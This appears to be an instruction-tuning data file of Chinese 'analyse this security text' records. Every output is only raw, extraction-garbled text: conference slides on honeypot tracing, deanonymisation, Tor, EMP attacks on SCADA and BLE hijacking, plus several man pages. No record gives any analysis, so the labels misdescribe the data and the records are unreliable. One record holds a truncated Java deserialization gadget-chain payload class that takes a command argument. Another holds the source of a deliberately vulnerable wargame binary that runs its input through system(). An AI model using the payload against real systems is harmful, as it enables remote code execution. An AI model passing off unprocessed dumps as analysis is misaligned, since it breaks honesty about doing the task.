{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n青衣2 0 1 1 .0 8 .2 9 剑 客 世界的溯源神话 青衣2 0 1 1 .0 8 .2 9  伤心的鱼 户实验室 程序猿 渗透狗 黑阔杂志编辑 产品经理 销售 青衣2 0 1 1 .0 8 .2 9 何为溯源 青衣2 0 1 1 .0 8 .2 9 何为溯源?一个找爹的过程 一定要给孩子找到爸爸 不能让他么有爹 乔布斯大神完全就是天龙八部中乔峰都是自小没见过亲生父母被平凡养 父母带大少年成名一跃登顶然后在世人瞩目中众叛亲离含恨隐去再 然后王者归来傲凌绝顶最终盛年之时颠峰乐章戛然而止留给世界一片 惊愕他俩共用一个称谓乔帮主 溯源黑客的攻击过程就像一个给孩子找爹的过程 青衣2 0 1 1 .0 8 .2 9 美国人是如何溯源的 藏宝图计划 青衣2 0 1 1 .0 8 .2 9 6 溯源能做神马? 青衣2 0 1 1 .0 8 .2 9 7 溯源能做神马? Where why 攻击手段分析 黑客工具分析 攻击者身份个人信息 网络指纹 安全事件轨迹 攻击者历史轨迹 who 青衣2 0 1 1 .0 8 .2 9 我们如何溯源? 青衣2 0 1 1 .0 8 .2 9 9 我们如何溯源? 青衣2 0 1 1 .0 8 .2 9 10 我们如何溯源? 青衣2 0 1 1 .0 8 .2 9 11 我们如何溯源? 青衣2 0 1 1 .0 8 .2 9 12 我们如何溯源? 青衣2 0 1 1 .0 8 .2 9 蜜罐 青衣2 0 1 1 .0 8 .2 9 hack数据 14 青衣2 0 1 1 .0 8 .2 9 目前捕获的总数据量IP:20104URL: 969 用户名28387密码869544软件及版本188 日增量IP:398URL:15用户名2785密码16149软件及版本23 蜜罐搜集到的信息 青衣2 0 1 1 .0 8 .2 9 16 蜜罐搜集到的信息 青衣2 0 1 1 .0 8 .2 9 17 青衣2 0 1 1 .0 8 .2 9 18 这些信息咋用 密罐----攻击来源------自动入库-----程序提取地址并解析倒入nmap自动扫描根 据namp扫描结果调用不同程序进行检测 青衣2 0 1 1 .0 8 .2 9 19 终于有卵用了 X.220.187.X ---- 这服务器太屌 一不小心就摘了桃子... 才3100个肉机而已 青衣2 0 1 1 .0 8 .2 9 20 终于有卵用了 青衣2 0 1 1 .0 8 .2 9 21 这B到底在这干什么  扫描mfu自动探测弱口令搜集入库  运行了screen脚本然后出现一句话Toata dragostea mea pentru diavola 一直在对开放SSH的服务器进行爆破 青衣2 0 1 1 .0 8 .2 9 22 relaxscan暴力破解SSH百度一下 你全知道 这B到底在这干什么 青衣2 0 1 1 .0 8 .2 9 23 你敢动我就把你老窝端了 青衣2 0 1 1 .0 8 .2 9 24 监测到的后门程序 该后门存在于www.gzs.gov.cn上被检测 到的时间上2015年8月6日00:25分黑客 访问过3次 青衣2 0 1 1 .0 8 .2 9 25 00:25分到00:13分来自美国的 IP为199.30.18.212 的黑客通过木马对网站进行了操作具体操作可以 通过溯源系统的返回包来查看 青衣2 0 1 1 .0 8 .2 9 来就来了还你妹的拿东西 内网IP:192.168.0.163 在2015.06.07.15:23频繁请求107.151.222.17:1250 一分钟内频繁请求msmm.exe此可疑文件 32次 26 青衣2 0 1 1 .0 8 .2 9 27 青衣2 0 1 1 .0 8 .2 9 28 恶意IP1 msmm.exe 可能是远控木马107.151.222.17为美国服务器非常可能机 子是专业的上线服务器并且有可能潜伏较久木马运行时间为 2015.06.07 15:23下载32次 美国队长 青衣2 0 1 1 .0 8 .2 9 29 恶意IP2: 发现此gy.exe是一款下载者程序并且下载服务器同样为美国同时下 载者执行后会再次连接到美国服务器的1996端口很可能是更新列 表或者上线端口下载者运行时间为2015.06.06 11:43 下载两次 美国队长 青衣2 0 1 1 .0 8 .2 9 30 你敢来犯就把你老窝端了 青衣2 0 1 1 .0 8 .2 9 攻击手法分析 肉鸡数据分析 反入侵调查 黑 客 老 巢 一 日 游 青衣2 0 1 1 .0 8 .2 9 32 平台于2015年1月7号左右搭建至2015年5月6号 搜集以上数据 青衣2 0 1 1 .0 8 .2 9 5 2 f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# apktool包描述 apktool用于对第三方的已编译的Android应用程序(apk文件)进行逆向工程通过使用该工具你可以对apk文件进行反编译和解包所反编译出的文件和编译前几乎一直另外也可以修改部分代码并进行重新打包;当然通过apktool的反编译功能可以生成支持单步调试的samli工程同时由于apktool简化和集成了很多自动化操作并且采用了统一的工程文件结构这使得对Android apk文件逆向过程变得很轻松 apktool绝不是为了满足盗版和其他的非法之需而是可以像某个应用的开发者一样通过使用它对应用完成一些如添加功能平台适配等本地化的工作来满足自己的需要 主要功能 * 对资源文件进行高还原度解码(包括resources.arscXMLs和.9.png文件) * smali 调试SmaliDebugging * 高自动化功能 **资料来源**:https://code.google.com/p/android-apktool [apktool Homepage](http://code.google.com/p/android-apktool/)|[Kali apktool Repo](http://git.kali.org/gitweb/?p=packages/apktool.git;a=summary) - 作者Brut.alll - 许可证Apache-2.0 ## apktool包中包含的工具 ### apktool Android apk逆向工具 ``` root@kali:~# apktool Apktool v1.5.2 - a tool for reengineering Android apk files Copyright 2010 Ryszard Wiśniewski <brut.alll@gmail.com> with smali v1.4.1, and baksmali v1.4.1 Updated by @iBotPeaches <connor.tumbleson@gmail.com> Apache License 2.0 (http://www.apache.org/licenses/LICENSE-2.0) Usage: apktool [-q|--quiet OR -v|--verbose] COMMAND [...] COMMANDs are: d[ecode] [OPTS] <file.apk> [<dir>] Decode <file.apk> to <dir>. OPTS: -s, --no-src Do not decode sources. 不对dex文件进行反编译 -r, --no-res Do not decode resources. 不对资源文件进行反编译 -d, --debug Decode in debug mode. Check project page for more info. 调试模式 -b, --no-debug-info Baksmali -- don't write out debug info (.local, .param, .line, etc.) 反编译不输出调试信息 -f, --force Force delete destination directory. 强制覆盖已存在文件目录 -t <tag>, --frame-tag <tag> Try to use framework files tagged by <tag>. 使用framework文件 --frame-path <dir> Use the specified directory for framework files framework文件目录 --keep-broken-res Use if there was an error and some resources were dropped, e.g.: \"Invalid config flags detected. Dropping resources\", but you want to decode them anyway, even with errors. You will have to fix them manually before building. 当出现错误或者资源文件缺失的时候使用该参数如提示\"Invalid config flags detected. Dropping resources\"但是你仍然想继续解包这样的话在进行打包之前需要手动修复那些错误的文件才能正常进行打包 b[uild] [OPTS] [<app_path>] [<out_file>] Build an apk fr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmpstat === 显示各个可用CPU的状态 ## 补充说明 **mpstat命令** 主要用于多CPU环境下它显示各个可用CPU的状态信息这些信息存放在`/proc/stat`文件中在多CPUs系统里其不但能查看所有CPU的平均状况信息而且能够查看特定CPU的信息 ### 语法 ```shell mpstat [选项] [<间隔时间> [<次数>]] ``` ### 选项 ```shell -P指定CPU编号 ``` ### 参数 - 间隔时间每次报告的间隔时间秒 - 次数显示报告的次数 ### 表头含义 - %user表示处理用户进程所使用CPU的百分比 - %nice表示在用户级别处理经nice降级的程序所使用CPU的百分比 - %system表示内核进程使用的CPU百分比 - %iowait表示等待进行I/O所占用CPU时间百分比 - %irq表示用于处理系统中断的CPU百分比 - %soft表示用于处理软件中断的CPU百分比 - %steal在管理程序为另一个虚拟处理器服务时显示虚拟的一个或多个CPU在非自愿等待中花费的时间的百分比 - %guest表示一个或多个CPU在运行虚拟处理器时所花费的时间百分比 - %gnice表示一个或多个CPU在运行经nice降级后的虚拟处理器时所花费的时间百分比 - %idleCPU的空闲时间百分比 ### 实例 当mpstat不带参数时输出为从系统启动以来的平均值 ```shell mpstat Linux 3.10.0-1160.71.1.el7.x86_64 (centos) 08/14/2022 _x86_64_ (4 CPU) 04:28:36 PM CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 04:28:36 PM all 0.03 0.00 0.07 0.00 0.00 0.01 0.00 0.00 0.00 99.89 ``` **每2秒产生了全部处理器的统计数据报告** 下面的命令可以每2秒产生全部处理器的统计数据报告一共产生三个interval的信息最后再给出这三个interval的平均信息默认时输出是按照CPU号排序第一个行给出了2秒内所有处理器使用情况接下来每行对应一个处理器使用情况 ```shell mpstat -P ALL 2 3 Linux 3.10.0-1160.71.1.el7.x86_64 (centos) 08/15/2022 _x86_64_ (4 CPU) 09:32:43 AM CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 09:32:45 AM all 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:45 AM 0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:45 AM 1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:45 AM 2 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:45 AM 3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:45 AM CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 09:32:47 AM all 0.00 0.00 0.12 0.00 0.00 0.12 0.00 0.00 0.00 99.75 09:32:47 AM 0 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:47 AM 1 0.00 0.00 0.50 0.00 0.00 0.00 0.00 0.00 0.00 99.50 09:32:47 AM 2 0.00 0.00 0.00 0.00 0.00 0.50 0.00 0.00 0.00 99.50 09:32:47 AM 3 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 100.00 09:32:47 AM CPU %usr %nice %sys %iowait %irq %soft %steal %guest %gnice %idle 09:32:49 AM all 0.00", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDark Data Svea Eckert  Andreas Dewes Who we are Svea Eckert Journalist (NDR/ ARD) @sveckert @japh44 Andreas Dewes Data Scientist (DCSO & 7scientists) Why we are here US Senate voted to eliminate broadband privacy rules that would have required ISPs to get consumers' explicit consent before selling or sharing Web browsing data (...) 3/23/2017 https://arstechnica.com What does that mean You can see everything  S*#t! ARD, Panorama, 03.11.2016 ARD, Panorama, 03.11.2016 I dont know, why I was searching for Tebonin at that time. This is really bad to see something like this  especially if it is connected with my own name. Employee of Helge Braun, CDU  Assistant Secretary of the German Chancellor How we did it  the hacking part Social engineering Social engineering What did we get? Our data set 3.000.000.000 9.000.000 3.000.000 URLs (insufficiently anonymized) Domains Users https://www.google.com/?q=xxxx... [user id] [timestamp]  30 days of data per user Statistical Deanonymization https://www.cs.cornell.edu/~shmat/shmat_oak08netflix.pdf How does it work? ... anonymized user data public / external personal data User 1 User 2 User N Identifier (e.g. name) e.g. user 1 visited domain X Lets try this! ... ... ... ... ... Domains Users => sparsely populated matrix with 9.000.000 x 1.000.000 entries Our Algorithm  Generate user/domain matrix M  Generate vector v with information about visited domains  Multiply Mv  Look for best match M = (...) w = Mv i = argmax (w) How well does this work? 15.561 1.114.408 www.gog.com kundencenter.telekom.de banking.sparda.de 11 367 1 handelsblatt.com But how can public information be extracted? Two examples Twitter  We use the Twitter API to download tweets from the relevant time period (one month)  We extract URLs from the tweets and generate the associated domain by following the links  We feed the domain information into our algorithm users (arbitrarily sorted) number of matching domains Visited Websites github.com (2.584.681) www.change.org", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnical changes since the last Tor talk Nick Mathewson The Tor Project <nickm@torproject.org> Defcon XV Aug 4, 2007  Tor was working, usable, and seemed pretty secure. (v 0.0.7.2)  Pretty small network.  No GUIhard to use.  We got a couple of Defcon talks! Marty! We've got to go back to the future2004!  Hacking on Tor.(Latest is 0.2.0.4-alpha)  Security: adding features/fixing security bugs.  Scalability: adding capacity is hard.  Scalability: using capacity is hard.  Usability: adding GUIs, fixing bugs.  Integration: working nice with other apps is hard.  Lots more: See the changelog.  Growing the network: ~200kuser, ~1kserver. What we've been up to since then. Outline  Prelude: brief, fast introduction to Tor  Directories and server discovery changes: More secure, more scalable!  Path generation changes: More efficient, less filling!  Circuit-building protocol changes: Oops. Crypto is hard.  Some fun new tools and features: What do you mean, I need to edit a file? Intro anonymity: anonymity networks hide users among users. Alice2 Bob1 Bob2 Alice1 Alice3 Network Intro Tor:There are a bunch of servers, connected via TLS (ssl). S S S S S S S S S Intro Tor:clients build circuits through a network of decrypting relays. 1. S S S S S S S S S Alice2 2. 3. Alice1 Intro Tor:circuits are used to relay multiple TCP streams. 1. S S S S S S S S S Alice2 2. 3. Bob1 Bob2 Alice1 4. See also: PipeNet, Onion Routing 6. 5. A hostile first hop can tell Alice is talking, but not to whom. S S S S S S S S S Alice2 Bob1 Bob2 Alice1 A hostile last hop can tell somebody is talking to Bob, but not who. S S S S S S S S S Alice2 Bob1 Bob2 Alice1 But: two hostile hops can correlate traffic patterns and link Alice to Bob. S S S S S S S S S Alice2 Bob1 Bob2 Alice1 No obvious fix that isnt extra-slow. I. Directories and server discovery  Every client must know every server.  (If you just ask a server for a list of neighbors, it can trivially lie.)  All clients must know the same servers.  Servers should", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: tclvars.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbCla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"REINDEX\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME REINDEX \\- 重建索引 .SH SYNOPSIS .sp .nf REINDEX { DATABASE | TABLE | INDEX } \\fIname\\fR [ FORCE ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBREINDEX\\fR 基于存储在表上的数据重建索引 替换旧的索引拷贝使用 REINDEX 有两个主要原因 .TP 0.2i \\(bu 索引崩溃并且不再包含有效的数据尽管理论上这是不可能发生的 但实际上索引会因为软件毛病或者硬件问题而崩溃REINDEX 提供了一个恢复方法 .TP 0.2i \\(bu 要处理的索引包含大量无用的索引页未被回收在某些情况下 这个问题会发生 在 PostgreSQL 里面的 B-树索引上REINDEX 提供了一个缩小索引空间消耗的方 法它采用的方法是写一个不带无用索引页的新版本的索引 参阅Section 21.2 ``Routine Indexing'' 获取更多信息 .PP .SH \"PARAMETERS 参数\" .TP \\fBDATABASE\\fR 恢复一个声明了的数据库的所有系统索引 不包含用户表上的索引同样除非在独立运行模式下也会忽略在共享系统表上的索引见下文 .TP \\fBTABLE\\fR 重新建立声明的表的所有索引如果表有个从属的\"TOAST\"表那么这个表也会重新索引 .TP \\fBINDEX\\fR 重新建立声明了的索引 .TP \\fB\\fIname\\fB\\fR 要重建的所声明的数据库/表/索引的名称 表和索引名可以有模式修饰 .TP \\fBFORCE\\fR 这是一个废弃的选项如果声明会被忽略 .SH \"NOTES 注意\" .PP 如果你怀疑一个用户表上的索引崩溃了你可以简单地重建该索引 或者该表上地所有索引使用 REINDEX INDEX 或者 REINDEX TABLE 另外一个对付用户表索引崩溃的方法时删除然后重建它如果你还要在表上进行一些维护动作 可能这么做更好一些REINDEX 在表上请求排他锁而 CREATE INDEX 只是锁住写动作 而不会锁住读 .PP 如果你从一个崩溃的系统表索引上恢复事情会更棘手一些 这种情况下系统必须不能使用任何有疑问的索引 实际上在这种情况下你可能发现服务器进程在启动之后马上就崩溃了 因为依赖于崩溃了的索引要想安全恢复服务器必须带着 -P 选项启动 它禁止服务器在查找系统表的时候使用索引 .PP 这么做个一个办法事停止 postmaster 然后带着 -P 命令行选项启动一个独立的 PostgreSQL 服务器 然后根据你希望恢复的程度可以发出 REINDEX DATABASEREINDEX TABLE或者 REINDEX INDEX 如果还有怀疑使用 REINDEX DATABASE 选择重新构造数据库中全部的系统索引 然后退出独立服务器会话并且重启普通的服务器参阅 \\fBpostgres\\fR(1) 手册页获取有关如何与独立服务器交互的信息 .PP 另外一个普通的会话可以在其命令行选项里带着 -P 启动 这么做的方法因不同的客户端而异但是在所有基于 libpq 的客户端上 我们都可以通过在启动客户端之前设置 PGOPTIONS 环境变量为 -P 来实现 请注意尽管这个方法并不要求锁住其它客户端但是禁止其它客户端连接受损的数据库 直到完成修补应该事一个明智的选择 .PP 如果怀疑任何共享的系统表的索引损坏(pg_database pg_group或者 pg_shadow 那么必须用独立服务器的方式来修复它REINDEX 不能在多用户环境下处理共享系统表 .PP 除了共享系统表之外的所有索引REINDEX 是抗崩溃并且是事务安全的 REINDEX 对于共享的索引而言不是抗崩溃的这就是为什么不允许在正常操作中这么使用的原因 如果在重新对一个共享表进行索引的时候发生了崩溃那么在纠正问题之前就不可能重新启动普通的服务器 一个建立了一部分的共享索引的典型症状是\"index is not a btree/索引不是 btree 索引\"错误 .PP 在 PostgreSQL 7.4 之前REINDEX TABLE 并不自动处理 TOAST 表因此这些表必须用独立的命令进行处理这么做仍然可以但是已经多余了 .SH \"EXAMPLES 例子\" .PP 重建表 mytable 上的索引 .sp .nf REINDEX TABLE my_t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nINJECTING ELECTROMAGNETIC PULSE INTO DIGITAL DEVICES  HISTORY OF EMP  STARFISH  MARX GENERATOR  PULSE PARAMETERS  DUMP DEVICES  SMART DEVICES  BYZANTINE FAULTS  SCADA  HOSPITALS  EMP IS MICROPROCESSOR AND OS  INDEPDENTENT  GREEN REVOLUTION  FLY BY WIRE  TWA 800  EMP DEVICE IN A CAMERA  ½*C*V*V = POWER IN JOULSE  POWER GRID  POWER QUALITY  TESLA COIL HISTORY OF EMP  COMPTON EFFECT(H BOMB)  TESLA COIL  MARX GENERATOR  EXPLOSIVE DEVICE ARMATURE H BOMB STARFISH  1962 US EXPLODED AN H BOOM 800 MILES FROM OAHU HAWAII  30 STRINGS OF STREET LIGHTS WENT OUT  300 STREET LIGHTS IN ALL THE MARX GENERATOR  INVENTED IN 1924  NOVEL CONCEPT TO CREATE HIGH VOLTAGE  CAPACITORS ARE CHARGED IN PARRALL  CAPACITORS DISCHARGE IN SERIES PULSE INJECTING  ELECTRICAL LINES  TELEPHONE  CABLE  COAXIAL  NETWORK  GROUNDING STRAP DUMB DIGITAL DEVICES  SIMPLE DIGITAL DEVICES  THEY KEEP ON WORKING AFTER BEING PULSED  STAND ALONG SENSORS (TEMP,PRESSURE,VOLTAGE)  A TYPE OF EMP FUZZING SMART DEVICES PULSED  THEY REBOOT  THEY NEED SOME OPERATOR TO MANUALLY RESET  THEY TURN OFF CONTROLLING A NETWORK OF DEVICES  AS LONG AS YOU KEEP PULSING THEY CAN NOT BRING THE NETWORK UP  LINUX,UNIX,SUN,WINDOWS,ROUTERS FIRE WALL  THEY WILL NOT BE ABLE TO REBOOT MOORES LAW  EVERY 18 MONTHS THE NUMBER OF TRANSITORS DOUBLES THAT CAN BE PUT ON A SILCON WAFFER  DIE SIZE DECREASES  VOLTAGE DECREASES NOT ALL EMP THE SAME DESIGNER EMP  PULSE WIDTH  PULSE RISE TIME  PULSE RATE  HARMONICS  FREQUENCY BYZANTINE FAULTS  LARGE REALTIME DISTRIBUTED SYSTEMS  BYZANETINE FAULT TOLERANCE AND RECOVERY  N IS THE NUMBER OF PROCESSES  T IS THE NUMBER OF CORUPTED PROCESSES  A SOLUTION IS ONLY POSSIBLE IF  N>3T+1 SUPERVISORY CONTROL AND DATA ACQUISITION  LARGE REALTIME DISTRIBUTED SYSTEMS  CONTROL,CHEMICAL,WATER,OIL, POWER SYSTEMS  LARGE MIX OF SMART AND DUMB DEVICES  FUZZING OF DUMB DEVICES GOING GREEN  GREEN BUSES SOLID STATE ENGINER CONTROLS  GREEN CARS ROBOTIC TRAIN  L TRAIN NYC  DC METRO TRAIN  THIRD RAIL SHOE ARC FLY BY WIRE  BOEING THE P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n日志分析之昨天今天与明天 关于我  安全爱好者  安全防御研究  2012-2015 当当网 网信金融  2015-今 万达电商 日志的价值 我们遇到的日志 议程  昨天  今天  明天 昨天  那些年还是iis的天下  0day?  注入我喜欢 :) 向当年的软件作者致敬  awk  grep  wc  uniq  sort  统计top n  关键字过滤 确定入侵时间 状态码过滤 类型过滤 IP分析 确定入侵文件 IP访问 确定时间 状态码过滤 Johnny Appleseed 日志展示界面可视化 今天  文件上传  平行权限  LFI  命令执行  Nday 工具 E.L.K FLUME FLUTEND  频率分析  关联分析 频率分析 基线与伐值 数据值  IP 访问次数  url 被访问次数 url深度 200比例 反问离散度 url 参数 关联分析 IDS 日志 FW 扫描器 关联分析 IP 关联  Event E1  Event E2  E2.Srcip==E1.Dstip NIDS 发现有webshell连接同时HIDS 发现文件变更操作 状态关联  Event E1  Event E2  E2.somestatus is success (or something)  基于漏洞关联  基于特征关联  基于异常关联 了解攻击者  什么时间  访问了哪些站点  做了什么  是否成功  水平如何  采用了什么技术 代理 扫描器 手工自动  更加强力的工具 来自唯品会孟诚  入侵不一定在时间上是连续的  日志的存储  特征值更新 明天  APT  0Day  未知威胁 关联分析优缺点  优点准确误报率低  缺点完全依靠经验 创建规则 发现攻击 建立模型 分析攻击  弥补关联分析的不足  感知异常  将更多的精力用在更重要的地方 URL特性 访问频率 GEOIP/PROX Y 访问内容 .. 日志 结果 U R L 特 性 访 问 频 率 G E O IP /P R O X Y 访 问 内 容  .. 日 志 结 果 U R L 特 性 访 问 频 率 G E O IP /P R O X Y 访 问 内 容  .. 日 志 结 果 U R L 特 性 访 问 频 率 G E O IP /P R O X 访 问 内 容  .. 日 志 结 果 U R L 特 性 访 问 频 率 G E O IP /P R O X 访 问 内 容  .. 日 志 结 果 URL特性 访问频率 GEOIP/PROX Y 访问内容 .. 日志 结果 机器学习  贝叶斯 来自 腾讯 江虎 机器学习  预测sql注入 机器学习  预测机器注册  SVM  K-means  HMM  决策树 格式化去噪音 获取数据 数据分析 结果 计算 回馈 Thank you ! lion_00@163.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYOU'D BETTER SECURE YOUR YOU'D BETTER SECURE YOUR BLE DEVICES OR WE'LL KICK BLE DEVICES OR WE'LL KICK YOUR BUTTS ! YOUR BUTTS ! @virtualabs | DEF CON 26, Aug. 12th 2018 WHO AM I ? WHO AM I ?  Head of R&D @ Econocom Digital Security  Studying Bluetooth Low Energy for 3 years  Developer & maintainer of BtleJuice  Having fun with Nordic's nRF51822  AGENDA AGENDA BLE sniffing 101 Improving the BLE arsenal Sniffing BLE connections in 2018 Introducing BtleJack, a flexible sniffing tool BtleJacking: a brand new attack How it works Vulnerable devices & demos Recommendations BLE SNIFFING 101 BLE SNIFFING 101 MUCH CHEAP TOOLS, MUCH CHEAP TOOLS, (NOT) WOW RESULTS (NOT) WOW RESULTS Sniffing existing/new connections with an Ubertooth One Sniffing new connections with an Adafruit's Bluefruit LE Sniffer Sniffing BLE packets with gnuradio Sniffs existing and new connections Does not support channel map updates Costs $120 UBERTOOTH ONE UBERTOOTH ONE Up-to-date soware (Nov. 2017) Proprietary firmware from Nordic Semiconductor Sniffs only new connections Costs $30 - $40 BLUEFRUIT LE SNIFFER BLUEFRUIT LE SNIFFER Sniffs only BLE advertisements Unable to follow any existing/new connection Latency Requires 2.4GHz compatible SDR device SOFTWARE DEFINED RADIO SOFTWARE DEFINED RADIO BLE SNIFFING 101 BLE SNIFFING 101 BLE is designed to make sniffing difficult: 3 separate advertising channels Uses Frequency Hopping Spread Spectrum (FHSS) Master or slave can renegotiate some parameters at any time Sniffing BLE connections is either hard or expensive MAN IN THE MIDDLE MAN IN THE MIDDLE HOW BLE MITM WORKS HOW BLE MITM WORKS Discover the target device (advertisement data, services & characteristics) Connect to this target device, it is not advertising anymore (connected state) Advertise the same device, await connections and forward data BTLEJUICE BTLEJUICE https://github.com/DigitalSecurity/btlejuice GATTACKER GATTACKER https://github.com/securing/gattacker Pros: Get rid of the 3 advertising channels issue Yo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport Utils.Gadgets; import Utils.Reflections; import org.mozilla.javascript.*; import org.mozilla.javascript.tools.shell.Environment; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Method; import java.util.Hashtable; import java.util.Map; @SuppressWarnings(\"unchecked\") public class Payload { public static Object getObject( String command) throws Exception { ScriptableObject dummyScope = new Environment(); Map<Object, Object> associatedValues = new Hashtable<Object, Object>(); associatedValues.put(\"ClassCache\", Reflections.createWithoutConstructor(ClassCache.class)); Reflections.setFieldValue(dummyScope, \"associatedValues\", associatedValues); Object initContextMemberBox = Reflections.createWithConstructor( Class.forName(\"org.mozilla.javascript.MemberBox\"), (Class<Object>)Class.forName(\"org.mozilla.javascript.MemberBox\"), new Class[] {Method.class}, new Object[] {Context.class.getMethod(\"enter\")}); ScriptableObject initContextScriptableObject = new Environment(); Method makeSlot = ScriptableObject.class.getDeclaredMethod(\"getSlot\", Context.class, Object.class, Class.forName(\"org.mozilla.javascript.ScriptableObject$SlotAccess\")); makeSlot.setAccessible(true); Object enumMakeGetter = Reflections.getField(Class.forName(\"org.mozilla.javascript.ScriptableObject$SlotAccess\"), \"MODIFY_GETTER_SETTER\").get(null); Object slot = makeSlot.invoke(initContextScriptableObject, null, \"foo\", enumMakeGetter); Reflections.setFieldValue(slot, \"getter\", initContextMemberBox); NativeJavaObject initContextNativeJavaObject = new NativeJavaObject(); Reflections.setFieldValue(initContextNativeJavaObject, \"parent\", dummyScope); Reflections.setFieldValue(initContextNativeJavaObject, \"isAdapter\", true); Reflections.setFieldValue(initContextNativeJavaObject, \"adapter_writeAdapterObject\", Payload.class.getMethod(\"customWriteAdapterObject\", Object.class, ObjectOutputStream.class)); Reflections.setFieldValue(initContextNativeJavaObject, \"javaObject\", initCon", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# level11 #### About The /home/flag11/flag11 binary processes standard input and executes a shell command. There are two ways of completing this level, you may wish to do both :-) To do this level, log in as the level11 account with the password level11. Files for this level can be found in /home/flag11. #### Sources ``` #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <fcntl.h> #include <stdio.h> #include <sys/mman.h> /* * Return a random, non predictable file, and return the file descriptor for it. */ int getrand(char **path) { char *tmp; int pid; int fd; srandom(time(NULL)); tmp = getenv(\"TEMP\"); pid = getpid(); asprintf(path, \"%s/%d.%c%c%c%c%c%c\", tmp, pid, 'A' + (random() % 26), '0' + (random() % 10), 'a' + (random() % 26), 'A' + (random() % 26), '0' + (random() % 10), 'a' + (random() % 26)); fd = open(*path, O_CREAT|O_RDWR, 0600); unlink(*path); return fd; } void process(char *buffer, int length) { unsigned int key; int i; key = length & 0xff; for(i = 0; i < length; i++) { buffer[i] = key; key -= buffer[i]; } system(buffer); } #define CL \"Content-Length: \" int main(int argc, char **argv) { char line[256]; char buf[1024]; char *mem; int length; int fd; char *path; if(fgets(line, sizeof(line), stdin) == NULL) { errx(1, \"reading from stdin\"); } if(strncmp(line, CL, strlen(CL)) != 0) { errx(1, \"invalid header\"); } printf(\"%s\",line + strlen(CL)); length = atoi(line + strlen(CL)); if(length < sizeof(buf)) { if(fread(buf, length, 1, stdin) != length) { err(1, \"fread length\"); } process(buf, length); } else { int blue = length; int pink; fd = getrand(&path); while(blue > 0) { printf(\"blue = %d, length = %d, \", blue, length); pink = fread(buf, 1, sizeof(buf), stdin); printf(\"pink = %d\\n\", pink); if(pink <= 0) { err(1, \"fread fail(blue = %d, length = %d)\", blue, length); } write(fd, buf, pink); blue -= pink; } mem = mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0); 